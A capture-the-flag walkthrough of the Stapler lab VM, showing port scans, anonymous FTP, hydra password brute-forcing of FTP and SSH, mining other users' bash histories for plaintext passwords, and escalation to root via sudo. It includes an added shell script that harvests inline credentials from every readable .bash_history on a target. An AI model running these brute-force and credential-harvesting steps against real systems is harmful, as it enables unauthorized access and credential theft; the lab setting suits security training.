Stapler Walkthrough

After finishing the Mr. Robot walkthrough I decided to do another one. In this post I show the walkthrough of Stapler, whose author is g0tmi1k.

attack machine: 192.168.56.102  
target machine: 192.168.56.104  

Use Nmap to check the open ports and services:

Nmap scan report for 192.168.56.104  
Host is up (0.00041s latency).  
Not shown: 992 filtered ports  
PORT     STATE  SERVICE  
20/tcp   closed ftp-data  
21/tcp   open   ftp  
22/tcp   open   ssh  
53/tcp   open   domain  
80/tcp   open   http  
139/tcp  open   netbios-ssn  
666/tcp  open   doom  
3306/tcp open   mysql

Nmap done: 256 IP addresses (2 hosts up) scanned in 50.05 seconds  

I always like to try port 80 first, but it failed here: I only got two files, bashrc and profile, and nothing useful in them.
There must be something I missed, so I scan the full port range:

Nmap scan report for 192.168.56.104  
Host is up (0.00055s latency).  
Not shown: 65523 filtered ports  
PORT      STATE  SERVICE  
20/tcp    closed ftp-data  
21/tcp    open   ftp  
22/tcp    open   ssh  
53/tcp    open   domain  
80/tcp    open   http  
123/tcp   closed ntp  
137/tcp   closed netbios-ns  
138/tcp   closed netbios-dgm  
139/tcp   open   netbios-ssn  
666/tcp   open   doom  
3306/tcp  open   mysql  
12380/tcp open   unknown  

Port 12380 is new. I open it in the browser, then run nikto for more information:

evilc@evilc:~$ nikto -h 192.168.56.104:12380  
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2017-06-24 17:43:01 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.56.104' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2017-06-24 17:45:57 (GMT-4) (176 seconds)

It seems this site uses SSL and robots.txt lists two directories, /blogblog/ and /admin112233/, so I switch to https:// and check both:
[screenshot: /admin112233/]
The /blogblog/ directory gives me something new:
[screenshot: /blogblog/]
I look around it and find a user, john, but I cannot brute-force his password.
So I choose another way in: FTP.

evilc@evilc:~$ ftp 192.168.56.104  
Connected to 192.168.56.104.  
220-  
220-|-----------------------------------------------------------------------------------------|  
220-| Harry, make sure to update the banner when you get a chance to show who has access here |  
220-|-----------------------------------------------------------------------------------------|  
220-  
220  
Name (192.168.56.104:evilc): anonymous  
331 Please specify the password.  
Password:  
230 Login successful.  
Remote system type is UNIX.  
Using binary mode to transfer files.  
ftp> ls  
200 PORT command successful. Consider using PASV.  
150 Here comes the directory listing.  
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.  
ftp>  

Download the note and read it:

evilc@evilc:/home/stapler$ cat note  
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.  

Well, at least I got another username, elly.
I use hydra to brute-force it (I hate it), and it succeeds. The -e nsr option tries three passwords per login: none (n), the same as the login (s) and the login reversed (r), so only three attempts are needed here:

evilc@evilc:/home/stapler$ hydra -l elly -e nsr ftp://192.168.56.104  
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-24 17:55:59  
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.56.104   login: elly   password: ylle
1 of 1 target successfully completed, 1 valid password found  
Hydra (http://www.thc.org/thc-hydra) finished at 2017-06-24 17:56:02  

Log in as elly with password ylle: there are a lot of files.
I download the passwd file and extract every username from it for an SSH brute force (again, I hate it):

evilc@evilc:~$ cat passwd | cut -d ":" -f 1 > username  
evilc@evilc:~$ cat username  
syslog  
_apt  
lxd  
dnsmasq  
messagebus  
sshd  
peter  
mysql  
RNunemaker  
ETollefson  
DSwanger  
...
evilc@evilc:~$ hydra -L username -e nsr ssh://192.168.56.104  
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-24 18:00:22  
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.56.104   login: SHayslett   password: SHayslett

Log in over SSH as SHayslett with password SHayslett:

evilc@evilc:~$ ssh SHayslett@192.168.56.104  
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
SHayslett@192.168.56.104's password:  
Welcome back!


SHayslett@red:~$ id  
uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)  

Walking around the system I see a lot of users in /home.
Check their bash_history files:

SHayslett@red:~$ find /home/ -name .bash_history > history  
find: ‘/home/peter/.cache’: Permission denied  
SHayslett@red:~$ cat history  
/home/MFrei/.bash_history
/home/Sam/.bash_history
/home/CCeaser/.bash_history
/home/DSwanger/.bash_history
/home/JBare/.bash_history
/home/mel/.bash_history
/home/jess/.bash_history
/home/MBassin/.bash_history
/home/kai/.bash_history
/home/elly/.bash_history
/home/Drew/.bash_history
/home/JLipps/.bash_history
/home/jamie/.bash_history
/home/Taylor/.bash_history
/home/peter/.bash_history
/home/SHayslett/.bash_history
/home/JKanode/.bash_history
/home/AParnell/.bash_history
/home/CJoo/.bash_history
/home/Eeth/.bash_history
/home/RNunemaker/.bash_history
/home/SHAY/.bash_history
/home/ETollefson/.bash_history
/home/IChadwick/.bash_history
/home/LSolum2/.bash_history
/home/SStroud/.bash_history
/home/LSolum/.bash_history
/home/NATHAN/.bash_history
/home/zoe/.bash_history

Read all of them, skipping the exit lines:

SHayslett@red:~$ for file in $(cat history); do cat $file | grep -v exit ;done  
free  
top  
ps aux  
id  
cat: /home/peter/.bash_history: Permission denied  
id  
cd /root  
ls  
cat flag.txt  
id  
whoami  
ls -lah  
pwd  
ps aux  
sshpass -p thisimypassword ssh JKanode@localhost  
apt-get install sshpass  
sshpass -p JZQuyIN5 peter@localhost  
ps -ef  
top  
kill -9 3747  
sudo -l  
cat /etc/sudoers  
su peter  
whoami  
top  
SHayslett@red:~$  
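
The loop above dumps every history file and leaves you to spot the secrets by eye. The script below, added here as an example and not part of the original post, does the same walk over a home tree but pattern-matches the commands that carry credentials inline (sshpass -p, mysql -p<pass>, curl -u user:pass) and prints tool:user:password, tagged with the file it came from. The sample history lines, the mysql and curl entries with their passwords, and the temporary home tree the demo builds are all constructed for the example.

```shell
#!/bin/sh
# Added example, not from the original post: harvest credentials that users
# typed inline on the command line, from every readable .bash_history.
set -eu

# Constructed sample history (the two sshpass lines mirror the post; the
# mysql and curl lines and their passwords are made up for the demo).
SAMPLE_HISTORY='ls -lah
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
mysql -u root -pS3cretDB wordpress
curl -u admin:hunter2 https://red.initech/phpmyadmin/
echo done'

# Read history lines on stdin, print tool:user:password for each hit.
harvest_creds() {
    awk '
    # sshpass -p <pass> ... <user>@<host>
    /sshpass +-p +/ {
        user = ""; pass = ""
        for (i = 1; i <= NF; i++) {
            if ($i == "-p") pass = $(i + 1)
            if ($i ~ /@/) { split($i, a, "@"); user = a[1] }
        }
        printf "sshpass:%s:%s\n", user, pass
        next
    }
    # mysql -u <user> -p<pass>   (password glued to -p)
    /^mysql / {
        user = ""; pass = ""
        for (i = 1; i <= NF; i++) {
            if ($i == "-u") user = $(i + 1)
            if ($i ~ /^-p./) pass = substr($i, 3)
        }
        if (pass != "") printf "mysql:%s:%s\n", user, pass
        next
    }
    # curl -u <user>:<pass>
    /^curl / {
        for (i = 1; i <= NF; i++) {
            if ($i == "-u" && $(i + 1) ~ /:/) {
                split($(i + 1), a, ":")
                printf "curl:%s:%s\n", a[1], a[2]
            }
        }
    }'
}

# Walk a home tree, skip files we cannot read (like peter's in the post),
# and tag each hit with the file it came from.
harvest_home() {
    find "$1" -name .bash_history 2>/dev/null | while IFS= read -r f; do
        [ -r "$f" ] || continue
        harvest_creds < "$f" | sed "s|^|$f: |"
    done
}

# Stand-alone demo on a constructed home tree; on the target you would
# call harvest_home /home instead.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/JKanode" "$tmp/zoe"
    printf '%s\n' "$SAMPLE_HISTORY" > "$tmp/JKanode/.bash_history"
    printf 'ls\nid\n' > "$tmp/zoe/.bash_history"
    harvest_home "$tmp"
    rm -rf "$tmp"
}

demo
```

The same idea extends to other history files (.zsh_history, .mysql_history, .python_history) and other inline-secret flags; the awk rules are independent, so adding one per tool is enough.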

That gives me two more username/password pairs from the history: JKanode:thisimypassword and peter:JZQuyIN5.
I try peter and get a new shell with peter's privileges (su drops me into zsh's first-run setup, which I abort), then check it:

--- Type one of the keys in parentheses --- 

Aborting.  
The function will be run again next time.  To prevent this, execute:  
  touch ~/.zshrc
red% id  
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)  
red% sudo -l

We trust you have received the usual lecture from the local System  
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
Matching Defaults entries for peter on red:  
    lecture=always, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:  
    (ALL : ALL) ALL
red%  

OK, (ALL : ALL) ALL means peter can run any command as any user with sudo...
So I switch to root:

red% sudo su  
➜  SHayslett id
uid=0(root) gid=0(root) groups=0(root)  
➜  SHayslett cd /root
➜  ~ ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql  
➜  ~ cat flag.txt 
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

➜  ~

Amazing

Done. The author says there are at least 2 ways to get a limited shell and at least 3 ways to get a root shell;
I will try the other ways in a future post.